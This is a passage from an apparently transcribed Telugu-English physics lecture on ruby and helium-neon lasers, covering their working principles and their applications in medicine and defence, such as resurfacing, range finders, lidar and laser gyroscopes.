ఎమిషన్ ప్రాసెస్ ద్వారా కిందకు వస్తాయి. సో స్టిమ్యులేటెడ్ ఎమిషన్ ప్రాసెస్ వల్ల మనకి ఇంకొక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. సో ఈ రెండు ఫోటాన్స్ రాడ్ యొక్క లెంత్ వెంబడి ప్రయాణిస్తూ మనకి మిగతా ఫోటాన్స్ని కూడా స్టిమ్యులేట్ చేస్తాయి. ఇందులో ఈ రెడ్ కలర్వి మనకి క్రోమియం అయాన్స్ అయితే ఎగ్జైటెడ్ స్టేట్లో ఉన్న క్రోమియం అయాన్స్ అయితే ఈ వైట్ యారోస్ మనకి ఫోటాన్స్. ఈ ఫోటాన్స్ ఏం చేస్తున్నాయంటే ఈ రెడ్ కలర్లో ఉన్న క్రోమియం అయాన్స్తో కొలిజన్స్ జరిపి వాటిని స్టిమ్యులేట్ చేసి వాటిని మళ్ళీ గ్రౌండ్ స్టేట్కి తీసుకురావడం వల్ల ఫోటాన్స్ యొక్క నెంబరు గ్రాడ్యువల్గా పెరుగుతుంది. ఎప్పుడైతే ఫోటాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా పెరుగుతుందో ఆటోమేటిక్గా చైన్ రియాక్షన్ జరుగుతుంది. చైన్ రియాక్షన్ జరగడం వల్ల మనకి లోపల లేజర్ ఇంటెన్సిటీ కూడా పెరుగుతుంది. ఈ లేజర్ ఇంటెన్సిటీ ఎప్పుడైతే ఒక పర్టికులర్ వాల్యూని రీచ్ అయిందో అప్పుడు మనకి ఈ పార్షియల్ రిఫ్లెక్టింగ్ సైడ్ నుంచి వేవ్ లెంత్ 694.3 నానోమీటర్స్ కలిగిన వేవ్ లెంత్ రూపంలో లేజర్ లైట్ అనేది బయటకు వస్తుంది. అయితే మనకి ఇక్కడ స్పాంటేనియస్ ఎమిషన్లో ఎమిట్ అయిన ఫస్ట్ ఫోటాను
ఈ ప్రాసెస్ అంతటినీ ట్రిగ్గర్ చేస్తుంది. అయితే ఈ రూబీ లేజర్ మనకి ఎక్కడెక్కడ అప్లై అవుతుంది? ఫస్ట్ వన్, ఇట్ ఈస్ యూజ్డ్ ఫర్ ప్రొడ్యూసింగ్ షార్ట్ లేజర్ పల్సెస్. అదేవిధంగా హోలోగ్రాఫిక్ పోర్ట్రైట్స్ని మనం తయారు చేయడంలో ఉపయోగపడుతుంది. లాస్ట్ వన్, హోలోగ్రామ్స్ ఆఫ్ లార్జ్ ఆబ్జెక్ట్స్ని తయారు చేయడంలో ఉపయోగపడుతుంది. అదేవిధంగా మన టాటూస్ కానీ హెయిర్ రిమూవల్ ప్రాసెస్లో కానీ ఈ రూబీ లేజర్స్ అప్లికేషన్స్ అనేవి చాలా విరివిగా ఉన్నాయి. అయితే రూబీ లేజర్స్లో ఉన్న డ్రాబ్యాక్ ఏంటి? దీనిలో ఉన్న మెయిన్ డ్రాబ్యాక్ ఏంటంటే ఇది పల్స్ లేజర్, ఇది కంటిన్యూస్ లేజర్ కాదు. నెక్స్ట్ ఇందులో వాడేది హై పంపింగ్ పవర్ కావాలి. నెక్స్ట్ అదేవిధంగా దీనికి ఎఫిషియన్సీ కూడా చాలా తక్కువ. నెక్స్ట్ ఇందులో రూబీ రాడ్ అనేది క్రిస్టలైన్ రూపంలో ఉంటుంది కాబట్టి క్రిస్టలైన్ ఇంపర్ఫెక్షన్స్ కూడా ఉండడం వల్ల కొన్ని డిఫెక్ట్స్ అనేవి ఉంటున్నాయి. లాస్ట్ వన్, ఇందులో హై ఎనర్జీ మనకి జీనాన్ ఫ్లాష్ ల్యాంప్ ఇచ్చినప్పటికి కూడా ఈ క్రోమియం అయాన్స్ అబ్జార్బ్ చేసుకునే ఎనర్జీ చాలా తక్కువగా ఉంటుంది. అంటే మిగతా ఎనర్జీ కూడా మొత్తం ఆపరేటస్ అంతటినీ హీట్ చేయడానికి ఉపయోగపడుతుంది. కనుక ఖచ్చితంగా ఈ ఆపరేటస్లో మనం కూలింగ్ అరేంజ్మెంట్ అనేది వాడి తీరాలి. సో ఈ డ్రాబ్యాక్స్ అన్నీ మనకి కొంతవరకు హీలియం నియాన్ లేజర్లో ఎలిమినేట్ అవుతాయి. సో హీలియం నియాన్ లేజర్ ఇందులో వాడేది గ్యాస్ సబ్స్టెన్సెస్ కనుక ఇది గ్యాస్ లేజరు. నెక్స్ట్ ఇందులో అవుట్పుట్ కంటిన్యూస్ వేవ్ రూపంలో వస్తుంది కాబట్టి ఇది కంటిన్యూస్ లేజరు. నెక్స్ట్ వన్, ఇందులో ఎలక్ట్రికల్ డిశ్చార్జ్ పంపింగ్ మెకానిజం వాడడం జరుగుతుంది. నెక్స్ట్ ఇందులో 4 లెవెల్స్ మధ్య మనకి ఎనర్జీ ట్రాన్సిషన్స్ అనేవి ఉంటాయి కాబట్టి మనకి ఇది 4 లెవెల్ లేజరు. అండ్ ద లాస్ట్ వన్, ఇందులో కూడా అవుట్పుట్ విజిబుల్ రీజియన్లో ఉంటుంది. సో ఇక్కడ ఈ హీలియం నియాన్ లేజర్ని ఫస్ట్ తయారు చేసింది జవాన్, బెన్నెట్ అండ్ డి హీరియట్. వీళ్ళు 1961లో దీన్ని రూపొందించారు. ఇందులో ఏముంటుంది? ఇందులో ఒక క్వార్ట్జ్డ్ ట్యూబ్ ఉంటుంది. ఈ క్వార్ట్జ్డ్ ట్యూబ్ యొక్క లెంత్ 80 సెంటీమీటర్స్ ఉంటే డయామీటర్ 1.5 సెంటీమీటర్స్ ఉంటుంది. ఇటువంటి క్వార్ట్జ్ ట్యూబ్లో మనకి 2 గ్యాసెస్ అనేవి మిక్స్చర్ రూపంలో ఉంటాయి. ఒకటి హీలియము అండ్ ద అదర్ వన్ ఈజ్ నియాన్. ఈ నియాన్ హీలియం యొక్క రేషియో ఎంత ఉంటుంది? 1:10 రూపంలో ఉంటుంది. అదేవిధంగా ఈ 2 గ్యాసెస్ కూడా 2 డిఫరెంట్ ప్రెషర్స్ వద్ద ఉంటాయి. అందులో హీలియం ప్రెషరు 1 mm ఆఫ్ మెర్క్యూరీ అయితే నియాన్ ప్రెషరు 0.1 mm ఆఫ్ మెర్క్యూరీ. నెక్స్ట్ ఈ క్వార్ట్జ్ ట్యూబ్కి ఒక ఎండ్ పర్ఫెక్ట్ రిఫ్లెక్టర్ ఉంటుంది, ఇంకొక ఎండ్ పార్షియల్ రిఫ్లెక్టర్ ఉంటుంది. సో దిస్ ఈజ్ వన్ రిఫ్లెక్టర్ అండ్ ద అదర్ వన్ ఈజ్ రిఫ్లెక్టర్ ఈజ్ దిస్. ఇందులో రెడ్ కలర్లో మెజారిటీ ఛార్జ్ క్యారియర్స్ ఉన్నవి మనకి హీలియం ఆటమ్స్ అయితే గ్రీన్ కలర్లో ఉన్నవి నియాన్ ఆటమ్స్. ఇది క్వార్ట్జ్ ట్యూబ్. ఇందులో లెంత్ 80 సెంటీమీటర్స్, డయామీటర్ 1.5 సెంటీమీటర్స్. నెక్స్ట్ ఎగ్జైటేషన్ అనేది ఇందులో జరిగే ప్రాసెస్ ఏంటంటే ఎలక్ట్రికల్ డిశ్చార్జ్. ఈ ఎలక్ట్రికల్ డిశ్చార్జ్ అనేది హై ఫ్రీక్వెన్సీ జనరేటర్ నుంచి వస్తున్న ఎలక్ట్రికల్ సిగ్నల్స్ రూపంలో ఎలక్ట్రికల్ డిశ్చార్జ్ జరిగి ఈ హీలియం ఆటమ్స్ కానీ నియాన్ ఆటమ్స్ కానీ ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్ళడం జరుగుతుంది. హౌ దిస్ లేజర్ లైట్ వర్క్స్? ఇందులో వర్కింగ్ ఫినామినన్ ఎలా ఉంది? ఈ ఎలక్ట్రికల్ డిశ్చార్జ్ వల్ల ఫస్ట్ ఆఫ్ ఆల్ హీలియం ఆటమ్స్ ఎనర్జీని అబ్జార్బ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్ E3, E5లోకి ఈ హీలియం ఆటమ్స్ వెళ్ళడం జరుగుతుంది. ఈ రెండు కూడా E3, E5 స్టేట్స్ హీలియం ఆటమ్స్కి మెటాస్టేబుల్ స్టేట్స్ కాబట్టి అక్కడికి వెళ్ళిన ఎలక్ట్రాన్స్ ఎక్కువ టైం స్పెండ్ చేస్తాయి, అంటే వాటంతట అవి కిందికి రావు. కనుక హీలియం ఆటమ్స్ యొక్క పాపులేషన్ ఇన్వర్షన్ అనేది E3, E5 స్టేట్స్లో అచీవ్ అవ్వడం జరుగుతుంది. E3, E5 స్టేట్స్లో ఉన్న హీలియం ఆటమ్స్ గ్రౌండ్ స్టేట్లో ఉన్న ఈ నియాన్ ఆటమ్స్తో కొలిషన్ జరుపుతాయి. కొలిషన్ జరిపినప్పుడు ఈ కొలిషన్ ప్రాసెస్లో హీలియం ఆటమ్స్ కొంత ఎనర్జీని ఈ నియాన్ ఆటమ్స్కి ట్రాన్స్ఫర్ చేస్తాయి. నియాన్ ఆటమ్స్కి ట్రాన్స్ఫర్ చేసిన ఈ ఎనర్జీని నియాన్ ఆటమ్స్ అబ్జార్బ్ చేసుకొని ఇవి ఎగ్జైటెడ్ స్టేట్స్కి వెళ్తాయి. అదేవిధంగా హీలియం ఆటమ్స్ ఎనర్జీని లాస్ అయిపోవడం వల్ల అవి మళ్ళీ తిరిగి గ్రౌండ్ స్టేట్కి రావడం జరుగుతుంది. సో అది ఈ ఫిగర్లో మనం క్లియర్గా అబ్జర్వ్ చేయొచ్చు. సో నియాన్ ఆటమ్స్ అనేవి ఎగ్జైటెడ్ స్టేట్లో ఉన్న హీలియం ఆటమ్స్తో కొలిషన్స్ జరపడం వల్ల అవి E3, E4, E5 ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్తాయి. కానీ అదే సమయంలో హీలియం ఆటమ్స్ ఎగ్జైటెడ్ స్టేట్స్లో ఉన్న హీలియం ఆటమ్స్ తిరిగి E1 అనే గ్రౌండ్ స్టేట్కి రావడం జరుగుతుంది. ఇందులో హీలియం ఆటమ్స్కి E4-, E5- రెండు కూడా మెటాస్టేబుల్ స్టేట్స్. నియాన్ ఆటమ్స్కి E4-, E5- ఈ రెండు స్టేట్స్ కూడా మెటాస్టేబుల్ స్టేట్స్, అంటే అక్కడికి వెళ్ళిన నియాన్ ఆటమ్స్ వాటంతట అవి తిరిగి కిందికి రాలేవు. సో ఆ విధంగా మనకి ఈ మెటాస్టేబుల్ స్టేట్స్లో నియాన్ ఆటమ్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. గ్రాడ్యువల్గా ఇంక్రీజ్ అవ్వడం వల్ల ఈ రెండు స్టేట్స్లో నియాన్ ఆటమ్స్ యొక్క పాపులేషన్ ఇన్వర్షన్ అనేది జరుగుతుంది. ఈ నియాన్ ఆటమ్స్లో పాపులేషన్ ఎప్పుడైతే ఇన్వర్షన్ జరిగిందో అప్పుడు మనకి స్పాంటేనియస్ ఎమిషన్ జరగడానికి ఒక హై ప్రాబబిలిటీ ఉంటుంది.
ఈ స్పాంటేనియస్ ఎమిషన్ వల్ల E4 నుంచి E3 కానీ లేదా E5 నుంచి E3 కానీ ఒక ఫోటాన్ అనేది ఎమిట్ అవ్వడం జరగవచ్చు. ఈ ఎమిటెడ్ ఫోటాన్ అనేది ఆ ట్యూబ్ యొక్క లెంత్ వెంబడి ట్రావెల్ చేస్తూ అటుపక్క ఇటుపక్క రిఫ్లెక్టర్స్ ఉండడం వల్ల ఆ రిఫ్లెక్టర్స్ వల్ల రిఫ్లెక్షన్స్కి అండర్గోన్ అవుతూ ఏదో ఒక సమయంలో ఇంకొక ఎగ్జైటెడ్ నియాన్ ఆటంతో ఇవి కొలిషన్స్ జరుపుతాయి. ఎగ్జైటెడ్ నియాన్ ఆటంతో ఎప్పుడైతే ఇవి కొలిషన్స్ జరిపాయో ఆ ఎగ్జైటెడ్ ఆటమ్ నియాన్ ఆటమ్ని కిందికి గ్రౌండ్ స్టేట్కి పంపిస్తూ ఎనర్జీని ఫోటాన్ రూపంలో ఎమిట్ చేయడం జరుగుతుంది. సో ఈ విధంగా మనకి ప్రాసెస్ చైన్ రియాక్షన్ కంటిన్యూస్గా జరుగుతూ ఫైనల్గా మనకి అవుట్పుట్ లేజర్ లైట్ రూపంలో మనకి బయటకు వస్తుంది. ఈ బయటకు వస్తున్న లేజర్ లైట్ యొక్క వేవ్ లెంత్ 632.8 నానోమీటర్స్. సో ఇది కూడా మనకి విజిబుల్ రీజియన్లో ఉంది కాబట్టి లెస్ దెన్ 7000 కాబట్టి ఇది కూడా విజిబుల్ రీజియన్లో ఉన్న లేజర్ లైట్. అయితే ఇందులో అప్లికేషన్స్ ఏంటంటే హీలియం నియాన్ లేజర్ యొక్క అప్లికేషన్స్. అందులో ఫస్ట్ వన్, ఇట్ ఈస్ ఆల్సో యూజ్డ్ ఫర్ ప్రొడక్షన్ ఆఫ్ హలోగ్రామ్స్. రెండోది యూజ్డ్ ఇన్ ల్యాబొరేటరీస్. మూడోది యూజ్డ్ ఇన్ ఆప్టికల్ కమ్యూనికేషన్ సిస్టమ్స్. అదేవిధంగా వీటి అడ్వాంటేజెస్ ఏంటి, ఇది కంటిన్యూస్ అవుట్పుట్ని ఇస్తుంది, అదేవిధంగా లెస్ ఎక్స్పెన్సివ్, లాస్ట్ వన్ దీనికి స్టెబిలిటీ చాలా ఎక్కువ. సార్ Next, we are going to discuss about applications of lasers. Lasers can be applied in various fields. అందులో ఫస్ట్ వన్ మెడిసిన్లోను, రెండోది కమ్యూనికేషన్స్లోను, మూడోది మనకి మిలిటరీ ఆర్ డిఫెన్స్ సెక్టర్లోను, నెక్స్ట్ వన్ ఇండస్ట్రియల్ సెక్టర్స్లోను, లాస్ట్ వన్ రీసెర్చ్లోను, అదేవిధంగా మనకి ఎంటర్టైన్మెంట్లో కూడా ఈ లేజర్స్ని ఉపయోగించవచ్చు. ఇందులో ఫస్ట్ మెడిసిన్లో ఎక్కడ వాడతారు? ఇన్ మెడిసిన్ లేజర్ రీసర్ఫేసింగ్ అనేది ఒక ప్రాసెస్ ఉంది. ఈ లేజర్ రీసర్ఫేసింగ్ ప్రాసెస్లో మన స్కిన్ మీద ఉన్న డ్యామేజ్డ్ సెల్స్ని ఈ లేజర్స్ ఉపయోగించి ఎలిమినేట్ చేయడం వల్ల ఆ ప్లేసెస్లో యంగర్ హెల్దియర్ సెల్స్ డెవలప్ అవుతాయి. ఇందులో మనం వాడేది CO2 లేజర్కి వాడతాం. ఈ CO2 లేజర్ ఏమవుతుందంటే మన స్కిన్ కింద ఉన్న కొలేజన్ని స్టిమ్యులేట్ చేయడం వల్ల మన స్కిన్ అనేది స్మూత్గా అవుతుంది. ఫర్ ఎగ్జాంపుల్ ఈ ఫిగర్లో కనుక మనం అబ్జర్వ్ చేస్తే ఇక్కడున్న ఈ డ్యామేజ్డ్ సెల్స్లో స్కిన్ మీద ఉన్న డ్యామేజ్డ్ సెల్స్ అన్నింటినీ ఈ ఫినామినన్ ద్వారా ఎలిమినేట్ చేయడం వల్ల ఆ స్కిన్ హెల్దీగాను యంగర్గాను కనబడుతుంది ఈ ఫిగర్లో. ఇది లేజర్ రీసర్ఫేసింగ్ ఫినామినన్. అదేవిధంగా రెండో దానికి వచ్చేసరికి బ్లూ లైట్ థెరపీ అనేది వాడడం జరుగుతుంది. ఈ బ్లూ లైట్ థెరపీలో ఏమవుతుంది, స్కిన్ మీద ఉన్న ఎన్లార్జ్డ్ పోర్స్, అదేవిధంగా పెర్సిస్టెంట్ యాక్నే. యాక్నే అంటే ఏంటంటే మనకి అడాల్సెంట్ స్టేజ్లో మన ఫేస్ మీద రెడ్ కలర్ మచ్చలు వస్తుంటాయి. ఇది ఎందుకు వస్తున్నాయంటే మనకి గ్లాండ్స్లో ఓవర్ సెక్రేషన్ వల్ల ఈ రెడ్ కలర్ మచ్చలు అనేవి ఏర్పడడం జరుగుతుంది. వీటన్నిటిని కూడా మనం ఈ లేజర్స్ ఉపయోగించి తీయడం జరుగుతుంది. అందులో అదేవిధంగా స్కేర్స్, మనం ముఖంపై ఏర్పడిన వివిధ రకాల మచ్చలు, మనకి పుట్టు మచ్చలే ఉన్న వాటన్నిటిని కూడా మనం ఈ లేజర్స్ ఉపయోగించి ఎలిమినేట్ చేయొచ్చు. ఈ ఫిగర్లో మనకి ఇక్కడిక్కడ ఉన్న రెడ్ కలర్స్ ఈ యాక్నే మొత్తం కూడా మనకి లేజర్ ట్రీట్మెంట్ వల్ల, బ్లూ లైట్ థెరపీ ట్రీట్మెంట్ వల్ల మొత్తం ఫేస్ అంతా కూడా క్లీన్గా మారుతుంది. అండ్ ఇందులో వాడేవి ఎక్కువగా ఎఫర్మ్ లేజర్స్ వాడుతుంటాం ఫేషియల్ రీజనరేషన్కి. అదేవిధంగా మనం ఇంకొక ట్రీట్మెంట్ వాడింది ఏంటంటే టీఎంఆర్ అంటే ట్రాన్స్ మైకార్డియల్ లేజర్ రీజనరేషన్. ఇదేం చేస్తుంది, మన హార్ట్లో ఉన్న ఆర్టరీస్ లేదా కరోనరీ ఆర్టరీస్లో బ్లడ్ బ్లాక్ అయితే ఈ బ్లడ్ బ్లాకేజ్ని మనం ఎలిమినేట్ చేస్తూ ఆ ఛానల్స్ని రీఓపెన్ చేయడానికి ఉపయోగపడుతుంది. ఇందులో వాడేది ఏంటంటే CO2 లేజర్ వాడతాం. ఈ CO2 లేజర్ ఏం చేస్తుందంటే హార్ట్లో ఉన్న స్మాల్ ఛానల్స్ని ఓపెన్ చేయడం వల్ల బ్లడ్ ఫ్లో అనేది హార్ట్లో ఫాస్ట్గా జరుగుతుంది. ఈ ప్రాసెస్లో మనం ఏం చేస్తామంటే లెఫ్ట్ చెస్ట్ ఇన్సిషన్ ద్వారా కానీ లేదా సెంటర్లో ఇన్సిషన్ ద్వారా కానీ ఆ ఛానల్స్ను ఓపెన్ చేయడం జరుగుతుంది. ఇది ఎక్కువగా బైపాస్ కరోనరీ ఆర్టరీ సర్జరీతో ఈ ప్రాసెస్ అనేది మనం ఎక్కువగా చేయడం జరుగుతుంది. అదేవిధంగా థర్డ్ ట్రీట్మెంట్ ఏంటంటే నెక్స్ట్ ఫైబర్ ఆప్టిక్ లేజర్ క్యాటహెటర్. ఇది దేనికి ఉపయోగపడుతుంది, ట్రీట్మెంట్ ఆఫ్ బ్లీడింగ్ అల్సర్స్లో ఉన్న బ్లీడింగ్ని ఎలిమినేట్ చేయడానికి ఇది ఉపయోగపడుతుంది. ఏదైనా ఒక అల్సరు కంటిన్యూస్గా బ్లీడ్ అవుతూ ఉంటే ఈ లేజర్ వల్ల ఆ అల్సర్ నుంచి వస్తున్న బ్లడ్ మొత్తం ఫోటోకాగులేట్ అవ్వడం వల్ల అక్కడ బ్లీడింగ్ అనేది స్టాప్ అవ్వడం జరుగుతుంది.
నెక్స్ట్ ప్రాసెస్ ఏంటంటే లేజర్ ఎండోస్కోపీ. ఈ లేజర్ ఎండోస్కోపీ అనేది ట్యూమర్స్లో మనం డైరెక్ట్గా ట్రీట్ చేయడానికి ఉపయోగపడుతుంది. ఏదైతే ట్యూమర్ ప్లేస్ ఉందో అక్కడ ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ దాని మీద పడేసరికి ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ వల్ల ఆ ట్యూమర్లో ఉన్న సెల్స్ అన్నీ కూడా డెస్ట్రాయ్ అవుతుంది. ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ని ఒక కంప్యూటర్ కంట్రోల్డ్ ఎక్విప్మెంట్ ద్వారా మనం కంట్రోల్ చేయొచ్చు. నెక్స్ట్ అప్లికేషన్ ఏంటంటే లేజర్ గ్లేజింగ్. ఈ లేజర్ గ్లేజింగ్ ఏంటి, మన టీత్ మీద ఉన్న డికే మొత్తాన్ని కూడా చారింగ్ చేయడానికి ఉపయోగపడుతుంది. ఫర్ ఎగ్జాంపుల్ ఏదైనా మన టీత్ క్యావిటీస్లో ఏదైనా డ్యామేజ్డ్ పార్ట్ కానీ లేదా ఇన్ఫెక్షన్స్ కానీ ఏమైనా ఉంటే ఈ లేజర్ బీమ్, హై ఎనర్జీ లేజర్ బీము ఆ క్యావిటీస్లో ఉన్న ఈ డ్యామేజ్డ్ సెల్స్ని మొత్తం డెస్ట్రాయ్ చేసి ఆ టీత్ మొత్తాన్ని కూడా మనకి శుభ్రం చేయడానికి ఈ లేజర్ గ్లేజింగ్ ఫినామినన్ అనేది వాడతాం. నెక్స్ట్ డిఫెన్స్ సెక్టార్లో, ఈ డిఫెన్స్ సెక్టార్లో మనం ఎక్కడెక్కడ వాడతాం, ఫస్ట్ వన్ అనేది ఈ లేజర్ రేంజ్ ఫైండర్స్. ఈ లేజర్ రేంజ్ ఫైండర్స్ దేనికి ఉపయోగపడతాయి, ఎనిమీస్ కానీ ఎనిమీ ట్యాంక్స్ యొక్క పొజిషన్ని కానీ యాక్యురేట్గా మనం ఫైండ్ అవుట్ చేయడానికి ఉపయోగపడుతున్నాయి. ఇందులో వాడేది మనకి నియోడినం లేజర్స్ కానీ CO2 లేజర్స్ కానీ. ఈ లేజర్ రేంజ్ ఫైండర్స్ దేని మీద ఆధారపడుతూ పనిచేస్తాయి, ఇవి మనకి రాడార్ అప్లికేషన్స్ మీద లేదా రాడార్ ప్రిన్సిపల్ మీద ఆధారపడుతూ ఈ రేంజ్ ఫైండర్స్ అనేవి పనిచేస్తాయి. ఇందులో మళ్ళీ 2 రకాలు ఉన్నాయి. ఒకటి ట్యాంక్ లేజర్ రేంజ్ ఫైండర్స్, రెండోది పోర్టబుల్ లేజర్ రేంజ్ ఫైండర్స్. ట్యాంక్ లేజర్ రేంజ్ ఫైండర్స్ ఎక్కడ వాడతామంటే మనకి ఆర్మర్డ్ వెహికల్స్లో కానీ ట్రక్స్లో కానీ ఆర్టిలరీలో కానీ వాడతాం. పోర్టబుల్ లేజర్ రేంజ్ ఫైండర్స్ ఆర్టిలరీలో ఉన్న ఫైర్ కంట్రోల్ సిస్టమ్స్లో వాడడం జరుగుతుంది. నెక్స్ట్ అండర్ వాటర్ లేజర్. ఈ లేజర్ని మనం అండర్ వాటర్ కమ్యూనికేషన్ కూడా వాడచ్చు. అయితే ఏ లేజర్స్ అయితే మనకి బ్లూ గ్రీన్ రీజియన్లో లేజర్ లైట్ని ఎమిట్ చేస్తున్నాయో అవి మాత్రమే మనం ఈ అండర్ వాటర్ కమ్యూనికేషన్కి వాడతాం. ఎందుకంటే బ్లూ గ్రీన్ రీజియన్ అనేది మోస్ట్ సూటబుల్ ట్రాన్స్మిషన్ ఇన్ సీ వాటర్. ఆ రీజియన్ మోస్ట్ సూటబుల్గా ఉంటుంది. నెక్స్ట్ ఆ అండర్ వాటర్ కమ్యూనికేషన్ అనేది ఎక్కువగా మనం నావీలో వాడతాం, నావీ సెక్టర్లో వాడుతుంటాం. ఇందులో వాడే లేజర్స్ NDYAG లేజరు, అదేవిధంగా ఆర్గాన్ అయాన్ లేజరు, గ్యాస్ లేజర్స్ కూడా వాడడం జరుగుతుంది. అయితే ఈ లేజర్స్ వల్ల ఉపయోగం ఏంటి, టార్పెడో సబ్మెరైన్స్ నుంచి వెలువడుతున్న టార్పెడోస్నా కానీ లేదా అన్మాన్డ్ వెహికల్స్ కానీ ఏమైనా ఉంటే వాటిని గైడ్ చేయడానికి ఉపయోగపడుతుంది. నెక్స్ట్ ఈ సబ్మెరైన్స్ మధ్య కమ్యూనికేషన్ అనేది విత్ అబ్సల్యూట్ ప్రైవసీ, అంటే ఇంకొకరికి తెలియకుండా సబ్మెరైన్స్ మధ్య కమ్యూనికేషన్ అనేది మనం ఈజీగా చేయొచ్చు. అయితే వీటికి మనం ఎక్కువగా వాడేది, మనం ప్రజెంట్ డేస్లో వాడేది సోనార్. అయితే సోనార్ వల్ల కొన్ని లిమిటేషన్స్ ఉన్నాయి. ఏమవుతుందంటే సోనార్ వేవ్స్ అనేవి మనకి ఎప్పుడైతే అబ్స్ట్రక్షన్స్లో మనకి వేల్స్ కానీ డాల్ఫిన్స్ కానీ మెరైన్ లివింగ్ యానిమల్స్ కానీ ఏమైనా వస్తే ఫాల్స్ సిగ్నల్స్ వస్తాయి సోనార్ వేవ్స్ వల్ల. రెండోది ఈ సోనార్ వేవ్స్ అనేవి సీ వాటర్ వల్ల బ్రాడనింగ్కి, నెక్స్ట్ స్కాటరింగ్ ఫినామినన్కి లోనవుతాయి. నెక్స్ట్ ఈ సోనార్ వేవ్స్ ఎమిట్ చేస్తున్న సోర్స్ని మనం లేదా ఎనిమీస్ ఈజీగా ఫైండ్ అవుట్ చేయొచ్చు. అంటే ఇది ప్రైవసీ ఉండదు, సీక్రసీ ఉండదు. కానీ ఆ సోనార్ ప్లేస్లో మనం ఈ అండర్ వాటర్ కమ్యూనికేషన్కి లేజర్స్ వాడితే మన సీక్రసీ అనేది లేదా ప్రైవసీ అనేది ఈజీగా మెయింటైన్ అవుతుంది. అదేవిధంగా రీసెంట్గా ఈ అండర్ వాటర్ కమ్యూనికేషన్ అనేది వయా శాటిలైట్ జరుగుతుంది. అంటే గ్రౌండ్ స్టేట్ నుంచి శాటిలైట్కి వెళ్ళి సిగ్నల్స్, ఆ శాటిలైట్ నుంచి అండర్ వాటర్ స్టేషన్కి అనేది ఈ కమ్యూనికేషన్ అనేది సిగ్నల్స్ రూపంలో పంపించడం జరుగుతుంది. నెక్స్ట్ లేజర్ గైడెడ్ యాంటీ ట్యాంక్ మిసైల్. ఇందులో ఒక మిసైల్ అనేది మనకి ఒక ట్యాంక్ నుంచి వెలువడుతున్న మిసైల్ అనేది అది IR బీమ్ వల్ల కంట్రోల్ అవుతూ IR బీమ్ వల్ల గైడ్ అవుతుంది. అంటే ఆ మిసైల్లో ఒక లేజర్ సోర్స్ ఉంటుంది. ఈ లేజర్ సోర్స్ నుంచి ఎమిట్ అవుతున్న లైటు ఎదురుగా ఉన్న టార్గెట్ మీద ఇన్సిడెంట్ అయ్యి ఆ టార్గెట్ నుంచి వస్తున్న స్కాటర్డ్ రేడియేషన్ వల్ల ఈ మిసైల్ వైపు రావడం వల్ల ఆ మిసైల్లో ఉన్న ఫోటో డిటెక్టరు ఆ టార్గెట్ నుంచి వస్తున్న స్కాటర్డ్ రేడియేషన్ని ఫైండ్ అవుట్ చేస్తూ ఆ టార్గెట్ యొక్క పొజిషన్ ఎక్కడుందో అనేది ఖచ్చితంగా ఈ మిసైల్కి చెప్తూ ఆ మిసైల్ కరెక్ట్గా టార్గెట్ని రీచ్ అయ్యే విధంగా ఇది గైడ్ చేస్తూ ఉంటుంది. ఫర్ ఎగ్జాంపుల్ ఇక్కడ కానీ మనం క్లియర్గా అబ్జర్వ్ చేస్తే ఈ మిసైల్ IR రేడియేషన్ వల్ల గైడ్ అవుతూ కరెక్ట్గా టార్గెట్ని రీచ్ అవుతుంది. అయితే ఇందులో వాడేది NDYAG లేజర్ వాడతాం. అదేవిధంగా ఇందులో మనకి ట్యాంక్ అనేది ఈజీగా టార్గెట్ని లేదా ట్యాంక్ని కానీ ఈజీగా మనం రీచ్ అవ్వచ్చు. నెక్స్ట్ వన్ ఈజ్ లీడార్. లీడార్ అంటే ఏంటి, లేజర్ని కనుక రాడార్ అప్లికేషన్స్ వాడితే దాన్ని మనం లీడార్ అంటున్నాం. ఇందులో కనుక అబ్జర్వ్ చేస్తే మనం ఈజీగా మనం డిస్టెన్సెస్ని యాక్యురేట్గా మరియు కరెక్ట్ వాల్యూస్ని మనం ఫైండ్ అవుట్ చేయొచ్చు. ఇందులో వాడే లేజర్స్ CO2 లేజరు, అదేవిధంగా గ్యాలియం ఆర్సెనైడ్ లేజర్ ఎక్కువగా వాడుతున్నాం.
ఇందులో మెయిన్ డ్రాబ్యాక్ ఏంటంటే వెదర్ కండిషన్స్ గుడ్గా ఉండాలి. ఈ లీడార్ను వాడుతున్నప్పుడు వెదర్ కనుక కరెక్ట్గా లేకపోతే అందులో ఉన్న ఫాగ్ వల్ల కానీ, రెయిన్ వల్ల కానీ, లేదా స్నో వల్ల కానీ ఈ లేజర్ బీమ్ అటెన్యూట్ అవ్వడం వల్ల మనకి లీడార్ అనేది కంప్లీట్గా వర్క్ అవ్వదు. కనుక వెదర్ కండిషన్స్ గుడ్గా ఉంటేనే ఈ లీడార్ అనేది మనం వాడచ్చు. లేని పక్షంలో మనకి యాక్యురేట్ మెజర్మెంట్స్ రావు, మళ్ళీ మనం రాడార్ మీద మాత్రమే డిపెండ్ అవ్వాలి. నెక్స్ట్ లేజర్ గైరోస్కోప్. ఈ లేజర్ గైరోస్కోప్ దేనికి ఉపయోగపడుతుంది? ఈ లేజర్ గైరోస్కోప్ అనేది స్మాల్ రొటేషన్స్ని కానీ మెజర్ చేయడానికి కానీ లేదా వాటిని ఫైండ్ అవుట్ చేయడానికి కానీ ఈ లేజర్ గైరోస్కోప్ వాడబడుతుంది. ఈ లేజర్ గైరోస్కోప్లో ఉండే లేజర్స్ ఏంటి? ఇందులో ఎక్కువగా వాడేది మనం హీలియం నియాన్ లేజర్ వాడతాం. ఈ హీలియం నియాన్ లేజర్ అనేది వాడడం వల్ల మనకి అక్కడ రొటేషన్ బాడీ యొక్క రొటేషన్ ఫినామినన్ మీద ఆధారపడుతూ సాగ్నెస్ ఎఫెక్ట్ అనేది ఒకటి ఉంది. ఈ సాగ్నెస్ ఎఫెక్ట్ ఏం చెప్తుంది? ఈ సాగ్నెస్ ఎఫెక్ట్ వల్ల ఏమవుతుందంటే బాడీలో ఏమాత్రం రొటేషన్ వచ్చినా ఆ రొటేషను ఇంటర్ఫెరోమీటర్ టెక్నిక్ వల్ల మనం క్లియర్గా 